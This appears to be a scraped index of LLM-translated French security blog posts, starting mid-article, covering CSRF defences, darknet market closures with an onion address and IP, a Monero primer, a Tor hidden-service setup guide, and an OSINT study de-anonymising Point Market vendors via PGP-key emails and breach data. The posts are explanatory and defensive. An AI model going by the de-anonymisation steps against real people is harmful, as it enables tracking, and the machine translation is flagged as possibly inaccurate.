l\u0026rsquo;état ne devrait utiliser des requêtes GET. À la place, il est par exemple possible de passer le jeton en utilisant une valeur cachée dans un formulaire :\n\u0026lt;form action=\u0026#34;//deluser\u0026#34; method=\u0026#34;POST\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;hidden\u0026#34; name=\u0026#34;csrf-token\u0026#34; value=\u0026#34;8927dd0eeb9b65500d148bdf7a144b598fc161c974d86e1ec18174ca7813ee8483f56035e28779aae83e11017b29fe08208b09d515cafb214e5defdbace07f36\u0026#34; /\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;username\u0026#34; /\u0026gt; \u0026lt;input type=\u0026#34;submit\u0026#34; name=\u0026#34;Delete the User\u0026#34; /\u0026gt; \u0026lt;/form\u0026gt; Une solution permettant de gérer la protection CSRF sans serveur est de mettre toutes les informations nécessaires pour valider la requête dans le jeton lui-même, puis de le chiffrer. Par exemple, nous pourrions créer une chaîne au format sessionId timestamp, la chiffrer, puis l\u0026rsquo;utiliser comme jeton.\nLorsque les utilisateurs font une requête, le serveur n\u0026rsquo;a qu\u0026rsquo;à déchiffrer le jeton, vérifier que l\u0026rsquo;identifiant de session appartient à l\u0026rsquo;utilisateur actuel et que l\u0026rsquo;horodatage se situe dans la fenêtre de temps attendue. Si les deux éléments sont corrects, alors le serveur peut poursuivre.\nL\u0026rsquo;intérêt d\u0026rsquo;utiliser un horodatage est de prévenir les attaques par rejeu. Par exemple, nous pourrions définir une règle disant que nous attendons que l\u0026rsquo;horodatage ne soit pas plus ancien que 5 minutes. Ensuite, si nous recevons un jeton avec un horodatage vieux de 10 minutes, la requête serait refusée.\nEn plus de cette sécurité, il serait possible de demander les mots de passe des utilisateurs, ou, si votre application implémente le TOTP, de demander un jeton pour valider une opération critique.\nAutres méthodes de protection # Double soumission de cookie # Une méthode populaire pour protéger les services contre les attaques CSRF est d\u0026rsquo;utiliser un cookie à double soumission. Pour chaque requête, le serveur va générer un cookie avec un jeton, et mettre également ce jeton dans la requête (par exemple, dans un champ caché de formulaire). Cette méthode repose sur l\u0026rsquo;hypothèse qu\u0026rsquo;il n\u0026rsquo;est pas possible d\u0026rsquo;écrire un cookie depuis un autre domaine, donc si le cookie et les champs cachés ont la même valeur, alors la requête doit être valide.\nC\u0026rsquo;est vrai, mais il y a plusieurs failles. L\u0026rsquo;une d\u0026rsquo;elles survient si vous ne contrôlez pas tous les sous-domaines de votre nom de domaine, car les sous-domaines peuvent écrire des cookies dans le domaine principal, et il n\u0026rsquo;est pas possible de distinguer facilement ce qui est écrit où. Par exemple, subdom1.dom.tld peut écrire un cookie sous dom.tld. À partir de là, si un attaquant contrôle subdom1.dom.tld, et que votre site web est hébergé sur subdom2.dom.tld, il peut écrire le cookie en utilisant subdom1, et il sera lu par votre application comme un cookie légitime généré par subdom2.\nSi vous vous demandez pourquoi l\u0026rsquo;utilisation d\u0026rsquo;un simple cookie ne suffit pas, c\u0026rsquo;est parce que les cookies sont toujours envoyés lorsque vous accédez à un site web, indépendamment de l\u0026rsquo;origine. Une façon d\u0026rsquo;atténuer ce problème (mais pas tous les autres) serait d\u0026rsquo;utiliser l\u0026rsquo;attribut SameSite Cookie, qui peut empêcher l\u0026rsquo;envoi de cookies dans certains scénarios. Notez que l\u0026rsquo;attribut SameSite Cookie devrait être implémenté en complément d\u0026rsquo;autres mesures, car il n\u0026rsquo;est pas suffisant en lui-même.\nUtiliser l\u0026rsquo;en-tête Referer # Une autre solution pour prévenir les CSRF serait de vérifier l\u0026rsquo;en-tête origin/referer lors de la validation des requêtes, et d\u0026rsquo;exécuter la requête si l\u0026rsquo;en-tête indique que la requête provient de notre site web. Cela n\u0026rsquo;est cependant pas considéré comme suffisant en soi, car cela peut rencontrer de multiples problèmes tels que ces en-têtes étant définis à null pour des raisons de confidentialité, ou supprimés par des proxys.\nUne solution quelque peu similaire, lors de l\u0026rsquo;utilisation de JavaScript, serait de définir des en-têtes personnalisés lors des requêtes. Cela fonctionnerait pour prévenir les CSRF car grâce à la politique de même origine (SOP) implémentée dans les navigateurs, il ne serait pas possible pour un adversaire de créer cet en-tête.\nSources # Bypassing CSRF Protections - A Double Defeat of the Double-Submit Cookie Pattern NetSparker: Using the Same-Site Cookie Attribute to Prevent CSRF Attacks NCC Group: Common CSRF Prevention Misconceptions OWASP: Cross Site Request Forgery OWASP: Cross-Site Request Forgery Prevention Cheat Sheet Play Framework: Protecting against Cross Site Request Forgery PortSwigger: What is CSRF? PortSwigger: CSRF Tokens PortSwigger: Defending against CSRF with SameSite cookies Stack Overflow: Why is the same origin policy so important? ","date":"2020-09-13","externalUrl":null,"permalink":"/fr/posts/2020/csrf-exploit-how-it-works-and-how-to-prevent-it/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nLe Cross-Site Request Forgery, ou CSRF, est une attaque qui permet de cibler des applications web. Typiquement, elle consiste à faire exécuter involontairement à un utilisateur une action sur un site où il est connecté.\n","title":"Vulnérabilité CSRF : comment ça fonctionne et comment s'en protéger ?","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nLe Roi est mort, vive le Roi !\nPlus tôt cette semaine, Empire, le plus grand marché du dark web anglophone, est suspecté d\u0026rsquo;avoir réalisé un exit scam. Le 20 août, le marché a commencé à ne plus répondre à cause d\u0026rsquo;une attaque DDoS. Cela a été confirmé dans les heures qui ont suivi sur Dread par Melbourne, l\u0026rsquo;un des modérateurs du marché. Plus tard dans la journée, le marché était parfois accessible avec beaucoup de patience, mais il a rapidement cessé de fonctionner.\nLe 26, Se7en, le modérateur principal du marché, a publié une annonce sur Dread : « Empire Market Update ». Comme le staff n\u0026rsquo;avait pas pu joindre les administrateurs depuis plus de 48 heures, il a déclaré qu\u0026rsquo;il était peu probable que les administrateurs reviennent.\nAnnonce de Se7en concernant Empire Market sur Dread À ce jour, ni les administrateurs ni le marché n\u0026rsquo;ont donné signe de vie. Fait intéressant, ces événements se sont produits peu de temps après la découverte que l\u0026rsquo;IP 94.140.115.23 est liée à http://erj7kwqkdkl73ewsuq6stztehx2tehk2aidxlex3btrfnjqax3ucvgyd.onion (l\u0026rsquo;une des adresses du marché) sur le port 443, mais il n\u0026rsquo;y a aucune preuve que cet événement joue ou non un rôle ici. Le serveur est toujours actif à ce jour. De plus, certains ont rapporté que des adresses appartenant à Empire déplaçaient des fonds, mais après les avoir examinées, je ne crois pas que ces adresses appartenaient effectivement à Empire.\nEmpire a été lancé en janvier 2018, peu après l\u0026rsquo;opération Bayonet. Selon dark.fail, il comptait environ 1,3 million d\u0026rsquo;utilisateurs et aurait réalisé un profit estimé de 2 638 BTC, soit 30 millions de dollars.\nQuoi qu\u0026rsquo;il en soit, l\u0026rsquo;arrêt des activités des marchés n\u0026rsquo;est pas rare sur le darknet, alors examinons les concurrents restants. J\u0026rsquo;ai compilé une liste des marchés les plus significatifs, avec la date à laquelle ils sont actifs, quelques chiffres sur leurs annonces, et (quand c\u0026rsquo;est possible) les utilisateurs et vendeurs, ainsi que les cryptomonnaies qu\u0026rsquo;ils acceptent et les fonctionnalités de paiement qu\u0026rsquo;ils offrent. Pour établir cette liste, j\u0026rsquo;ai choisi d\u0026rsquo;ignorer tous les marchés qui sont des forums (par exemple, The Majestic Garden) et ceux qui ne sont pas anglophones (par exemple, Hydra).\nNotez que les chiffres fournis dans toutes les listes suivantes sont tous auto-déclarés par les marchés.\nPrincipaux marchés actifs : statistiques et options de paiement (copiez l\u0026rsquo;URL et ouvrez-la dans un nouvel onglet pour zoomer) En examinant la liste, nous pouvons observer que tous les marchés sont relativement récents, les plus anciens étant en activité depuis 2018. Bien que le BTC reste la monnaie la plus supportée, le XMR a gagné en popularité (comme mentionné dans mon Introduction à Monero) et est supporté par presque tous les marchés. Le séquestre multisignature reste largement impopulaire, puisque seulement trois marchés sur douze le supportent.\nDeux des plus grands marchés, White House et DarkMarket, publient heureusement des statistiques sur leur page d\u0026rsquo;accueil, nous permettant ainsi d\u0026rsquo;évaluer leur croissance au cours des derniers jours.\nLe tableau suivant présente le nombre d\u0026rsquo;annonces, d\u0026rsquo;utilisateurs et de vendeurs à différents moments (tous les horaires pour les deux marchés sont en JST - GMT +9) et pour les deux marchés.\nChiffres de White House Market Chiffres de DarkMarket En quelques jours, le nombre d\u0026rsquo;utilisateurs de WHM a augmenté de 9,83 % et a dépassé la barre des 200 000, et son nombre de vendeurs a augmenté de 11,76 %. DarkMarket a gagné un peu moins de nouveaux utilisateurs et vendeurs, avec une augmentation de 6,07 % et 13,42 % respectivement. Dans tous les cas, ces deux chiffres sont assez impressionnants, et ces deux marchés sont de sérieux prétendants pour devenir le nouveau roi.\n","date":"2020-08-29","externalUrl":null,"permalink":"/fr/posts/2020/august-dark-markets-update-empire-market-is-gone-whos-left/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nLe Roi est mort, vive le Roi !\n","title":"Mise à jour des marchés du dark web en août - Empire a disparu. Qui reste ?","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nMonero (XMR) est, avec ZCoin, l\u0026rsquo;une des cryptomonnaies axées sur la confidentialité les plus utilisées. Dernièrement, elle semble gagner en popularité auprès des personnes souhaitant envoyer des fonds en cryptomonnaies tout en restant discrètes. Entre autres, elle est souvent recommandée sur certains forums du dark web comme alternative aux mixeurs Bitcoin et a été utilisée par les auteurs de WannaCry pour blanchir des fonds.\nCet article vise à donner un aperçu relativement général du fonctionnement de Monero et des mécanismes qui lui permettent d\u0026rsquo;être plus anonyme que Bitcoin et d\u0026rsquo;autres cryptomonnaies. Nous n\u0026rsquo;entrerons pas dans les détails mathématiques et de minage, et bien que l\u0026rsquo;article reste relativement accessible, il suppose que vous êtes au moins un peu familier avec Bitcoin.\nLancé en avril 2014, Monero est basé sur un fork de Bytecoin (oui, Bytecoin, pas Bitcoin), mais a démarré depuis le bloc Genesis (c\u0026rsquo;est-à-dire que le registre XMR ne contient pas les transactions Bytecoin). Il est basé sur la preuve de travail, mais contrairement à Bitcoin, l\u0026rsquo;algorithme est adapté aux CPU, rendant le minage un peu plus accessible à tous. L\u0026rsquo;offre de jetons est infinie. Elle atteindra environ 18 millions de jetons d\u0026rsquo;ici mai 2022, puis 0,6 XMR seront générés par bloc (contre environ 1,5 actuellement). Un bloc prend en moyenne deux minutes à miner et n\u0026rsquo;a pas de taille maximale fixe.\nAdresses et clés # Tout d\u0026rsquo;abord, pour effectuer des transactions avec Monero, nous aurons besoin d\u0026rsquo;une adresse. Avec la plupart des autres cryptomonnaies, lors de la création d\u0026rsquo;une adresse, nous aurions une paire de clés publique/privée. Avec Monero, les choses sont un peu plus compliquées, car quatre clés (deux paires) sont générées :\nLa clé publique de visualisation est la seconde moitié de l\u0026rsquo;adresse Monero. Elle sera utilisée par les personnes souhaitant nous envoyer des fonds. La clé privée de visualisation permet de scanner le registre pour trouver les transactions que les gens nous envoient. Cette clé peut être rendue publique, mais cela signifie que tout le monde pourra voir nos transactions. La clé publique de dépense est la première moitié de l\u0026rsquo;adresse Monero. Elle sera utilisée dans la phase d\u0026rsquo;anneau (plus de détails plus tard). La clé privée de dépense est ce que nous utiliserons pour signer les transactions que nous effectuons. Cette clé ne doit jamais être partagée. Exécuter une transaction # Maintenant que nous avons nos clés, nous pouvons commencer à recevoir des fonds. Disons que Bob nous doit de l\u0026rsquo;argent et qu\u0026rsquo;il va nous rembourser en Monero. Voici ce qui va se passer :\nNous donnerons notre adresse à Bob. Bob utilisera nos clés publiques de visualisation et de dépense pour créer une adresse à usage unique (ou adresse furtive) où il enverra les fonds. Cette adresse garantira que notre véritable adresse n\u0026rsquo;est jamais affichée dans le registre, rendant ainsi impossible pour quiconque de savoir combien de fonds nous détenons. Bob créera ensuite la transaction. C\u0026rsquo;est là que la signature en anneau entre en action. Bob prendra 10 sorties (ou mixins) émises par d\u0026rsquo;autres transactions dans le registre (exigence du protocole) et les utilisera comme entrées avec la véritable entrée d\u0026rsquo;où les fonds sont envoyés. Cela empêche tout tiers de savoir quelle entrée est la source des fonds pour une transaction. Ring CT (Confidential Transaction) est également utilisé et permet de masquer le montant envoyé dans la transaction. En utilisant notre clé privée de visualisation, nous scannerons la blockchain pour trouver les transactions qui nous sont envoyées, et nous pourrons voir l\u0026rsquo;adresse à usage unique générée par Bob, et donc le paiement. Nous pourrons ensuite dépenser ces fonds en utilisant notre clé privée de dépense. Une fois cela terminé, la confidentialité est assurée pour Bob comme pour nous :\nBob ne peut pas voir combien de fonds nous détenons, car il ne connaît que l\u0026rsquo;adresse à usage unique qu\u0026rsquo;il a créée et ne peut pas scanner le registre pour trouver nos autres adresses puisqu\u0026rsquo;il n\u0026rsquo;a pas notre clé privée de visualisation. Nous ne pouvons pas savoir avec certitude d\u0026rsquo;où Bob envoie les fonds, car il y a plusieurs entrées et nous ne pouvons pas être sûrs de laquelle appartient à Bob. Bob ne pourra pas savoir quand nous dépensons les fonds, ni où. La raison est que notre adresse peut être utilisée dans les tours de signature en anneau d\u0026rsquo;autres utilisateurs. Quelques détails supplémentaires # Signature en anneau et Ring CT # Si vous avez lu tout ce qui précède, vous vous poserez probablement cette question : « Si les montants envoyés sont masqués, et si nous ne pouvons pas savoir quelle entrée est l\u0026rsquo;origine des fonds, alors comment les mineurs peuvent-ils savoir si la transaction est valide ? »\nPour résoudre ce problème, deux éléments seront générés sur la base des mathématiques et de la cryptologie :\nL\u0026rsquo;image de clé est une clé publique générée pour la transaction. Elle permet de confirmer qu\u0026rsquo;une entrée de la transaction est valide, sans dire laquelle, empêchant ainsi les doubles dépenses de se produire. Un engagement de Pedersen indiquera au réseau que les sommes des valeurs des entrées et des sorties sont égales et que la transaction est donc valide. Entrées et sorties # Comme Bitcoin, Monero exige que toutes les entrées soient dépensées dans une transaction, nécessitant donc la création d\u0026rsquo;adresses de change. Il permet également de payer vers plusieurs sorties et d\u0026rsquo;utiliser plusieurs entrées.\nPour chaque entrée réelle que nous utilisons dans une transaction, il y aura une signature en anneau. Par conséquent, il y aura toujours au moins dix fausses et une vraie sortie.\nSources et ressources intéressantes # Voici une liste des sources que j\u0026rsquo;ai utilisées lors de la rédaction de cet article, ainsi que quelques ressources intéressantes. Certaines offrent également un niveau de détail plus élevé sur des sujets comme les signatures en anneau, donc si cela vous intéresse, vous devriez les consulter.\nA low-level explanation of the mechanics of Monero vs Bitcoin in plain English Understanding Monero Cryptography, Privacy \u0026ndash; Introduction Understanding Monero Cryptography, Privacy Part 2 \u0026ndash; Stealth Addresses Cryptonote protocal Whitepaper Moneropedia Breaking Monero 06: Unusual Ringsize Zcash VS Monero: Comparative Privacy Coin Guide Monero Documentation What is Monero? (XMR) Stack Exchange: What is a key image? Stack Exchange: Monero terminologies Addresses Generation and Checking Tool Transaction Checker Tool ","date":"2020-08-23","externalUrl":null,"permalink":"/fr/posts/2020/an-introduction-to-monero/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nMonero (XMR) est, avec ZCoin, l’une des cryptomonnaies axées sur la confidentialité les plus utilisées. Dernièrement, elle semble gagner en popularité auprès des personnes souhaitant envoyer des fonds en cryptomonnaies tout en restant discrètes. Entre autres, elle est souvent recommandée sur certains forums du dark web comme alternative aux mixeurs Bitcoin et a été utilisée par les auteurs de WannaCry pour blanchir des fonds.\n","title":"Introduction à Monero","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDans cet article, nous allons voir comment mettre en place un service caché Tor (également appelé service onion), et quelles sont les options de base que nous pouvons utiliser pour le configurer. Ensuite, j\u0026rsquo;expliquerai plus en détail le protocole, et ce qui se passe exactement lorsqu\u0026rsquo;un client essaie d\u0026rsquo;accéder à un service caché.\nJ\u0026rsquo;écris ce tutoriel en me basant sur la dernière version d\u0026rsquo;Ubuntu, en supposant qu\u0026rsquo;un serveur web est déjà en fonctionnement.\nInstallation # Tout d\u0026rsquo;abord, nous devons installer Tor. Cela peut se faire via apt, mais la documentation officielle déconseille d\u0026rsquo;utiliser les dépôts communautaires, car ils ont l\u0026rsquo;habitude de ne pas être mis à jour correctement en temps voulu. Nous allons ajouter le dépôt maintenu par Tor dans notre /etc/apt/sources.list :\ndeb https://deb.torproject.org/torproject.org focal main deb-src https://deb.torproject.org/torproject.org focal main Ensuite, nous ajouterons la clé PGP du dépôt à notre système, et installerons Tor :\ncurl https://deb.torproject.org/torproject.org/A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89.asc | gpg --import gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - apt-update apt install tor deb.torproject.org-keyring Configuration # Fichier de configuration Torrc # Maintenant que Tor est installé, nous pouvons le configurer. Cette étape est étonnamment facile à réaliser, car il suffit d\u0026rsquo;éditer le fichier de configuration /etc/tor/torrc pour y ajouter ce qui suit. Notez que le service sera automatiquement créé en tant que v3. Vous pouvez créer un service v2, mais cela n\u0026rsquo;a pas d\u0026rsquo;intérêt, car la v2 sera bientôt désactivée.\nHiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:80 Ces deux lignes feront ce qui suit :\nHiddenServiceDir est l\u0026rsquo;emplacement où Tor va créer/lire l\u0026rsquo;adresse et les clés du service. Vous devez vous assurer que l\u0026rsquo;utilisateur debian-tor peut correctement lire/écrire dedans. De plus, comme il contiendra des informations sensibles, vous voudrez vous assurer que les droits d\u0026rsquo;accès sont 700. HiddenServicePort nous permet de mapper un port vers un service. Ici, Tor enverra les connexions du port 80 vers 127.0.0.1:80. Vous pouvez avoir plusieurs ports cachés pour un seul répertoire de service. Il est également possible d\u0026rsquo;utiliser un socket pour servir le contenu en utilisant unix:/path/to/socket. Notez également qu\u0026rsquo;il est possible d\u0026rsquo;avoir plusieurs services configurés. Vous devrez simplement répéter les deux lignes précédentes avec des informations différentes (le répertoire du service doit être différent également !) tout en gardant l\u0026rsquo;ordre HiddenServiceDir, puis HiddenServicePort.\nLe répertoire du service caché # Lorsque la configuration est éditée et le service relancé en utilisant systemctl restart tor, nous devrions avoir les éléments suivants dans notre répertoire hidden_service :\nFichiers créés dans le HiddenServiceDir hostname contiendra l\u0026rsquo;URL du service caché, et hs_ed25519_*_key les clés publique et privée. Vous voudrez sauvegarder soigneusement les clés, car les perdre entraînera la perte de l\u0026rsquo;URL de votre service.\nLe répertoire authorized_clients permet de faire ce que son nom indique. Pour ce faire, vous devrez créer des fichiers au format something.auth. Chacun de ces fichiers ne doit contenir qu\u0026rsquo;une seule ligne au format \u0026lt;auth-type\u0026gt;:\u0026lt;key-type\u0026gt;:\u0026lt;base32-encoded-public-key\u0026gt;. Cette page explique très bien comment générer les informations pertinentes à mettre dans ce fichier, et comment configurer un client pour pouvoir s\u0026rsquo;authentifier.\nAjouter de la sécurité supplémentaire # Je n\u0026rsquo;entrerai pas dans les détails de la sécurisation d\u0026rsquo;un serveur lors de l\u0026rsquo;utilisation de Tor, mais voici une liste non exhaustive de choses que vous voudrez faire :\nAssurez-vous de ne lier aucune information sur le serveur Méfiez-vous de l\u0026rsquo;accès aux ressources locales via Tor Utilisez de préférence Tor en tant que client et non en tant que relais (pour empêcher quiconque de faire une corrélation entre la panne de votre passerelle et la panne de votre service caché) Consultez le Projet Vanguard, qui permet d\u0026rsquo;ajouter plus de sécurité contre les attaques de désanonymisation. En résumé, le scénario que Vanguard essaie d\u0026rsquo;éviter est le suivant : un adversaire fait beaucoup de requêtes à votre service caché tout en faisant fonctionner plusieurs relais. L\u0026rsquo;un de ses relais pourrait être choisi comme noeud intermédiaire (entre le garde et les relais de points de rendez-vous). À partir de là, il serait possible de compromettre le relais garde et de trouver l\u0026rsquo;IP du point de service. Débogage # Si pour une raison quelconque rien n\u0026rsquo;est créé dans le répertoire que vous avez mis dans la configuration, ou si votre service est inaccessible, et si tout est correctement configuré, vous pouvez démarrer le serveur Tor en utilisant sudo -u debian-tor tor, ce qui donnera un peu plus d\u0026rsquo;informations sur l\u0026rsquo;initialisation du serveur (par exemple s\u0026rsquo;il ne peut pas se connecter au réseau).\nVous pouvez également activer la journalisation en ajoutant ce qui suit au fichier de configuration :\nSafeLogging 0 Log notice file /path/nf.log Log info file /path/if.log Notez que si vous exécutez Tor en mode client, il n\u0026rsquo;est pas nécessaire d\u0026rsquo;ouvrir un port entrant dans le pare-feu. Vous devez simplement vous assurer d\u0026rsquo;autoriser les connexions sortantes vers le port 443.\nComment les clients se connectent au service caché # Maintenant, vous vous demandez peut-être comment tout cela fonctionne au niveau des connexions ? Cette partie est là pour vous aider à comprendre cela. Si après la lecture vous avez encore soif d\u0026rsquo;informations, vous pouvez consulter les spécifications du protocole.\nInitialisation du service # Comme nous l\u0026rsquo;avons vu dans la configuration, nous avons besoin d\u0026rsquo;une clé publique et d\u0026rsquo;une clé privée pour le service. Elles seront utilisées pour sécuriser les communications et pour générer l\u0026rsquo;adresse du service. Tor peut le faire lui-même, mais certains créeront manuellement la clé afin d\u0026rsquo;obtenir une adresse personnalisée en répétant la génération de clé un grand nombre de fois jusqu\u0026rsquo;à ce que l\u0026rsquo;adresse commence par une certaine chaîne. Par exemple, facebookcorewwwi.onion (voir la troisième partie de cet article) Lorsque les clés sont créées, le service caché choisira quelques noeuds pour agir comme points d\u0026rsquo;introduction. Le service caché se connecte ensuite à ces noeuds (en utilisant des circuits Tor, et jamais directement car cela annulerait l\u0026rsquo;objectif d\u0026rsquo;être anonyme !), et partage sa clé publique avec eux. Il maintiendra ensuite la connexion ouverte avec eux. Le service caché crée ensuite un descripteur de service caché contenant sa clé publique et l\u0026rsquo;identité de ses points d\u0026rsquo;introduction. Il signera ensuite ce descripteur avec sa clé publique et le téléversera vers 6 répertoires de services cachés (des noeuds réguliers avec le drapeau HSDir activé) qui font partie du système DHT (Table de hachage distribuée). Notez que si l\u0026rsquo;étape (1) n\u0026rsquo;est évidemment exécutée qu\u0026rsquo;à la création du service, les suivantes sont répétées régulièrement. Si vous souhaitez en savoir plus sur le DHT, vous pouvez consulter cet article (présentant la collecte de données à partir du DHT).\nConnexion des clients # Lorsqu\u0026rsquo;un client essaie de se connecter à un service caché, voici ce qui se passe :\nLe client demande au DHT le descripteur du service caché Le client choisit un relais aléatoire pour agir comme point de rendez-vous et s\u0026rsquo;y connecte (via un circuit) Le client crée un message d\u0026rsquo;introduction, incluant l\u0026rsquo;adresse du point de rendez-vous et un secret à usage unique. Il le chiffre ensuite en utilisant la clé publique du service caché et l\u0026rsquo;envoie à un point d\u0026rsquo;introduction Le point d\u0026rsquo;introduction transfère le message d\u0026rsquo;introduction au service caché Le service caché se connecte au point de rendez-vous et lui envoie le secret à usage unique dans un message de rendez-vous Le point de rendez-vous notifie ensuite le client que la connexion a réussi À partir de là, le client et le service caché peuvent communiquer ensemble. Le point de rendez-vous agira comme une passerelle et ne verra que des messages chiffrés ","date":"2020-08-10","externalUrl":null,"permalink":"/fr/posts/2020/hosting-a-website-on-tor-a-simple-walkthrough/","section":"Articles","summary":"Cet article explique comment configurer un service caché Tor, et comment le protocole fonctionne pour permettre à sa localisation de rester cachée.","title":"Héberger un site web sur Tor : un guide simple","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nPour des raisons évidentes, si vous menez des activités douteuses sur les marchés du darknet, vous ne voulez laisser aucune trace menant à vous. Par conséquent, vous éviteriez d\u0026rsquo;utiliser une adresse email pour vous y inscrire, et c\u0026rsquo;est probablement pourquoi la plupart des plateformes ne la demandent pas ; n\u0026rsquo;est-ce pas ? Cela dit, presque tous les marchés du dark web utilisent PGP à diverses fins telles que la communication sécurisée, l\u0026rsquo;authentification à deux facteurs, etc. Comme PGP peut être assez obscur pour certaines personnes, et comme les logiciels demandent généralement une adresse email lors de la génération des clés PGP, cela peut nous permettre de collecter des données potentiellement intéressantes en fonction de ce que les utilisateurs choisissent d\u0026rsquo;entrer.\nPoint Market est très aimable de proposer une API qui permet d\u0026rsquo;accéder à pratiquement tout ce qui se trouve sur le marché. À partir de là, nous pouvons obtenir des données sur 296 boutiques différentes (une boutique correspond à un vendeur). Nous pouvons remarquer que 295 vendeurs ont une clé PGP configurée pour leur compte.\nAprès avoir ingéré les données, nous pouvons observer que la grande majorité des emails semblent être valides (et la majorité d\u0026rsquo;entre eux est hébergée chez Gmail !). Il y a cependant quelques vendeurs avisés qui n\u0026rsquo;ont pas entré d\u0026rsquo;email (ou un email manifestement faux) lors de la génération de leur clé PGP.\nCependant, obtenir les emails seuls n\u0026rsquo;est peut-être pas très parlant en soi car, bien que certains fournisseurs choisis par les vendeurs ne soient clairement pas un bon choix du point de vue de la sécurité opérationnelle, accéder aux emails avec un environnement Tor correctement configuré pourrait ne pas être si dangereux. Pour évaluer quels emails pourraient être utilisés en dehors du marché, nous avons ajouté deux métriques au graphique suivant. La ligne rouge représente le nombre de vendeurs dont le nom ne figure pas dans l\u0026rsquo;email associé à la clé PGP, et la ligne jaune est le nombre d\u0026rsquo;adresses uniques ayant été compromises au moins une fois (source : haveibeenpwned.com). La ligne bleue représente simplement le nombre de clés PGP associées à un email dans le domaine mentionné.\nNombre de vendeurs utilisant le service désigné dans leur clé PGP Bien que la métrique rouge offre une représentation discutable de la réalité, le nombre de comptes compromis peut être une métrique utile car elle nous permet de voir quels comptes sont utilisés et où. De plus, de manière surprenante, il semble que de nombreux comptes aient été compromis, ce qui suggère que certains vendeurs utilisent les emails sur des services courants, augmentant leurs chances de laisser des traces menant à eux. Évaluons à quel point c\u0026rsquo;est grave en examinant quels types de services sont compromis.\nNombre de comptes de vendeurs compromis par service Ce que nous pouvons d\u0026rsquo;abord observer est un grand nombre de services (69 pour 25 utilisateurs uniques) où les différentes adresses email ont été utilisées. Notez que pour calculer le graphique, les domaines d\u0026rsquo;emails manifestement faux n\u0026rsquo;ont pas été inclus, ainsi que deux adresses Gmail qui semblent être potentiellement fausses (jb@yahoo.fr et SP@gmail.com).\nCertains services ont du sens quand on considère le type d\u0026rsquo;activité que ces personnes mènent (par exemple Cannabis Forum ou Online Spambot), même s\u0026rsquo;il ne semble toujours pas judicieux de ne pas utiliser un email unique par service. Cependant, certains semblent être une très mauvaise idée comme Adobe, MyFitnessPal, TheTVDB, Edmodo ou Funimation. Même s\u0026rsquo;ils sont utilisés avec des paramètres Tor sécurisés, Adobe pourrait lancer une mise à jour inattendue, MyFitnessPal peut révéler quel type de produits/marques l\u0026rsquo;utilisateur consomme, TheTVDB et Funimation quel type de films/séries il aime, et Edmodo est une application de course, elle est censée être utilisée avec un GPS ! Toutes ces informations combinées peuvent fournir des informations personnelles identifiables très utiles pour traquer un utilisateur.\nBien sûr, il est possible que certains emails dans les fuites soient encore faux (par exemple utilisés dans le PGP mais n\u0026rsquo;appartenant pas à un utilisateur spécifique), mais il n\u0026rsquo;aurait guère de sens d\u0026rsquo;utiliser un email aléatoire non manifestement faux. En même temps, certaines adresses non compromises sont utilisées ailleurs (par exemple sur Twitter avec un numéro de téléphone associé). Une analyse plus approfondie de ces adresses, ainsi que des tentatives d\u0026rsquo;utilisation de diverses sources OSINT, sera réalisée dans de futurs articles.\n","date":"2019-02-28","externalUrl":null,"permalink":"/fr/posts/2019/tracking-point-market-vendors-from-their-pgp-keys-part-1/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nPour des raisons évidentes, si vous menez des activités douteuses sur les marchés du darknet, vous ne voulez laisser aucune trace menant à vous. Par conséquent, vous éviteriez d’utiliser une adresse email pour vous y inscrire, et c’est probablement pourquoi la plupart des plateformes ne la demandent pas ; n’est-ce pas ? Cela dit, presque tous les marchés du dark web utilisent PGP à diverses fins telles que la communication sécurisée, l’authentification à deux facteurs, etc. Comme PGP peut être assez obscur pour certaines personnes, et comme les logiciels demandent généralement une adresse email lors de la génération des clés PGP, cela peut nous permettre de collecter des données potentiellement intéressantes en fonction de ce que les utilisateurs choisissent d’entrer.\n","title":"Traquer les vendeurs de Point Market à partir de leurs clés PGP (Partie 1)","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nAvec la fermeture de deux marchés noirs majeurs, juillet a été un mois difficile pour l\u0026rsquo;économie souterraine. Quelques jours seulement après qu\u0026rsquo;AlphaBay soit devenu inaccessible, nous avons appris que non seulement AlphaBay avait été fermé par les forces de l\u0026rsquo;ordre (ce qui était attendu à ce stade), mais aussi que Hansa était géré par celles-ci depuis un mois et avait été transformé en un piège mortel pour ses utilisateurs. Cet article vise à fournir un aperçu de la chronologie des événements ayant mené à ce jour et de la façon dont les forces de l\u0026rsquo;ordre ont mis en place un piège mortel pour les utilisateurs de ces plateformes.\nL\u0026rsquo;histoire commence le 5 juillet vers 03h00 UTC, lorsqu\u0026rsquo;AlphaBay est soudainement devenu hors ligne sans préavis. Le même jour, plusieurs opérations de police ont été signalées. Au Canada, la GRC et le FBI ont mené trois perquisitions. Une à Montréal et deux à Deux-Rivières, au Québec. L\u0026rsquo;objectif de ces raids était la saisie de matériel informatique, et 